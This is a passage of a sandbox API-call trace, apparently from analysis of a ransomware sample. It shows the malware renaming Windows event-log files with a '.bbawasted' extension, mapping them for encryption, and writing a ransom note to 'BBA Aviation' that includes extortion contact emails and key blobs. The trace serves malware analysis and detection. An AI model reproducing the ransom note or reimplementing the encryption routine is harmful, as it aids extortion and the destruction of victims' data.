0x6bb6f0 [0183.917] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a62c8) returned 1 [0183.947] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0183.947] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0183.947] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4operational.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0183.948] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0183.949] SetEndOfFile (hFile=0x28c) returned 1 [0183.949] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0183.949] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0183.949] lstrcpyW (in: lpString1=0x6aed78, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0183.949] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4operational.evtx.bbawasted")) returned 1 [0183.950] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4operational.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0183.950] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0183.951] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x211000 [0183.951] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x211000) returned 0x5480000 [0183.951] CloseHandle (hObject=0x280) returned 1 [0184.471] UnmapViewOfFile (lpBaseAddress=0x5480000) returned 1 [0184.518] CloseHandle (hObject=0x294) returned 1 [0184.518] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0184.518] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6c58) returned 1 [0184.519] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0184.519] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0184.519] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a60a8) returned 1 [0184.520] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0184.520] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0184.796] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0184.796] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0184.796] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0184.796] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]KQsqCOI9tZZ9uRBlgjH6PScJuIGb6RvP6qwWTfrG+qUtAcZ5LHqaD7H7xvTUxE0u\r\n0JLAFjH56SbBQMfhEkXZPpnAZuOrhxd9fk+EUTXvymYR216j3DeaQKSAHDKTGJoN\r\n6QIEGv/KuT2/OdBG9WPang6A+su4fe08eY/g2EqUJd/U94vvQGJGCd8INVtG2gZk\r\nW6nGFt9bKgY+pw6nB8Zyad62EoBU2Onss7WS5BF6vTBfaDWVf+CJMADzg5ZAvP8I\r\nd5dZxup6dNlW6iMHKcQHmJth9XmF95viHFFi0K9VL3naKr0xizKCqG7WEjJ7J8QE\r\nHCgcM6HzQssgzNeH/WzbO6TnQVC7z9Q/zEgZBEBH11kMoYTaA60877aIpTdynJYP\r\n1vWDxwq2PU90b1/9vyDNPNqPE0DIvUY2Qw3eSBi6rYqWIQVnQhVaiRvZ6qtafon6\r\n/rJZ8Zwnikv7D+f9ZwNunKUOcI2BNqmsJsJy6HSV3ilqqq8dRll53iLc/BSJQJXK\r\nojmgFQatXXk/F35qmksVGWnpTujTVDDoyPyuvNbCEbw5lbvkjyvA6iLiD8liVVwC\r\nXCETdXaGU7V2OJqNBFGArttumrL4xkuB0FHW/IxrIlUS8Iqx+APzHybBDeEHEyAt\r\ne2u7ikcSxKURPwDFjyNOwLwim7QUcxF33wpiylGZqBa=[end_key]\r\nKEEP IT\r\n") returned 984 [0184.796] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0184.796] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0184.797] SetEndOfFile (hFile=0x28c) returned 1 [0184.799] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0184.799] CloseHandle (hObject=0x28c) returned 1 [0184.802] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0184.802] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69eae0 | out: hHeap=0x660000) returned 1 [0184.802] _aulldvrm () returned 0x0 [0184.802] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6928) returned 1 [0184.803] CryptGenRandom (in: hProv=0x6a6928, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0184.803] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0184.803] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 67 [0184.803] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x290) returned 0x6aecf0 [0184.804] lstrcpyW (in: lpString1=0x6aed76, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0184.804] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0184.804] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a65f8) returned 1 [0184.804] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0184.804] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0184.804] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4restricted.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0184.812] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0184.813] SetEndOfFile (hFile=0x28c) returned 1 [0184.814] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.814] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0184.814] lstrcpyW (in: lpString1=0x6aed76, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0184.814] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4restricted.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4restricted.evtx.bbawasted")) returned 1 [0184.816] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4restricted.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0184.817] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0184.817] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0184.817] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0184.817] CloseHandle (hObject=0x294) returned 1 [0184.823] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0184.824] CloseHandle (hObject=0x280) returned 1 [0184.824] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0184.824] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a63d8) returned 1 [0184.825] CryptGenRandom (in: hProv=0x6a63d8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0184.825] CryptReleaseContext (hProv=0x6a63d8, dwFlags=0x0) returned 1 [0184.825] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a65f8) returned 1 [0184.826] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0184.826] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0184.837] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0184.837] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0184.837] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0184.837] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]BrU1KqLTMu3Ip6M6uVtozkGvuGJVuYLFHgS4NPdF5W8LYISaCqxdCSSe+NeYrE5X\r\n0ZWVyE1KCp3cAynIS1wo/Dl96xyOOl58cjxF910Ckao1dGGwPLqTCESVW8m/tdKz\r\njxsYkAZB7p/cIQGAhTnjHFA3kO9O+ZSeAzYex/cSx8PCn+e3b/FytGhkPjyhXFaP\r\nYpUyOpKLOdGrv0CRyd56y2iQH+0uVDUD47+gDwkGO3uB40WF6BSHUmvDUzqVG8dW\r\nnSchuyyeaLLg1YfSLUrCjZ8Zke3gjNbu2lOGMVsb9geB63QeQa50HT4g3u00BnJj\r\n/vzMrWxkaXwzYor+ZBgF+WfA6OrcapOc7mY/CZvbZf6Mk+xcE13r7jvii/QnbuEX\r\nE7D955uqwKNChHK1Ah/80RSyTTq55MmZTMD+NGzl/IFhYl2Gre2r99oB8F9Fdltj\r\njqr5Ppjtak1MGnl/RfwE0K/rELPUUdSy2o4qBU8CxFYbkMz30eVvv1kDd+cte0In\r\nNSJ7CWvSxMb25Nwcnrr2Zbefl9iG/xSvLqFlOIAgerQusEN994v/hgsT5t+TLF6z\r\nUMQRpFtdgivv4tpSd9U3XMHS+D4VUZDE+il6shwIK514uZ1uWI7+U57FiiD165WC\r\nINAmMiyPMlkab+DTpd+MrorecCdqzCXpoCO05gaHVNC=[end_key]\r\nKEEP IT\r\n") returned 984 [0184.837] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0184.837] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0184.837] SetEndOfFile (hFile=0x28c) returned 1 [0184.950] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0184.950] CloseHandle (hObject=0x28c) returned 1 [0184.956] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0184.957] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69ebc8 | out: hHeap=0x660000) returned 1 [0184.957] _aulldvrm () returned 0x0 [0184.957] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6240) returned 1 [0184.958] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0184.958] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0184.958] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 61 [0184.958] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x284) returned 0x6aecf0 [0184.959] lstrcpyW (in: lpString1=0x6aed6a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0184.959] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0184.959] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6bd0) returned 1 [0184.959] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0184.959] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0184.960] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-appxpackaging%4operational.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0184.961] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0184.962] SetEndOfFile (hFile=0x28c) returned 1 [0184.962] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.962] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0184.962] lstrcpyW (in: lpString1=0x6aed6a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0184.962] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxpackaging%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-appxpackaging%4operational.evtx.bbawasted")) returned 1 [0184.964] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-appxpackaging%4operational.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0184.964] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0184.964] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0184.964] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0184.965] CloseHandle (hObject=0x280) returned 1 [0184.973] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0184.974] CloseHandle (hObject=0x294) returned 1 [0184.974] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0184.974] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6c58) returned 1 [0184.975] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0184.975] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0184.975] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a60a8) returned 1 [0184.975] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0184.975] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0184.985] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0184.985] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0184.985] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0184.985] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]c8/kmB0S1MazG5gOHlQvzw1OKP1DVOj5OJccONghN4jJ9ApPBm7drlz2pSTA2E05\r\n0BHZN9carubdyn57zu0k50UQ6SIfHJyRfCV4GKKHkLm9+7yIUH8nLh11/oHGww6O\r\nBmizupwL/Iugiv6fOyWcqViaVK5za9mIGwt1qIWl8U1iJ8TPB4lo0MKxYnstScwN\r\nhqmVjeCsBXXnf0Si4Soa+PWTHUZ3b494RQ61KxqM9614xo1ypaZOmmZ2YFsRE0aY\r\nXsh1D38+HSeHtWASATNXdwMeoP/1Y940Gc0n3wgHymk7Ac1P7GFvrMbTfJdHlJge\r\n1XRpCWQBZIPzkmz4Oienw7H0bUdY+YMDGS+4lynAe542nkaRd+E8SOORO/VVeCrE\r\nzs3h+pg49RhvrJ0qEyLApeMwbYH93rHntwzaQcXZmRIsdapdDNNTvHlzXp+ET1Zf\r\nriKGn3PFC1OUb0L3hvUhgPMsxQvvqrlW0ZvaHz+qsX+kmklndFkNBou5An74Rq0b\r\n7kLaOeXmnnzXVpjtE9g33Aa96H+ZulSjwDz02lsAnNR4oGeR66cE/15Zh7eufPHu\r\ng0mHWId6EtiU+osBeUW+JojGqbxWCkBZyKQoz0aonZJeLObu/JfgrwhjO7+M6oN0\r\nNVIdVMm7kTmL4TqWSvwIS1A0mutqhJrWXmNAOXSoCCG=[end_key]\r\nKEEP IT\r\n") returned 984 [0184.985] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0184.985] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0184.985] SetEndOfFile (hFile=0x28c) returned 1 [0184.988] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0184.988] CloseHandle (hObject=0x28c) returned 1 [0185.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0185.106] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x67a0e0 | out: hHeap=0x660000) returned 1 [0185.106] _aulldvrm () returned 0x0 [0185.106] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6928) returned 1 [0185.106] CryptGenRandom (in: hProv=0x6a6928, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0185.107] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0185.107] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 76 [0185.107] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2a2) returned 0x6aecf0 [0185.107] lstrcpyW (in: lpString1=0x6aed88, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0185.107] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0185.107] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a5f98) returned 1 [0185.107] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0185.107] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0185.107] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-backgroundtaskinfrastructure%4operational.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0185.108] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0185.109] SetEndOfFile (hFile=0x28c) returned 1 [0185.109] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.109] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0185.109] lstrcpyW (in: lpString1=0x6aed88, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0185.109] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-backgroundtaskinfrastructure%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-backgroundtaskinfrastructure%4operational.evtx.bbawasted")) returned 1 [0185.111] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-backgroundtaskinfrastructure%4operational.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0185.111] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0185.111] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0185.111] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0185.111] 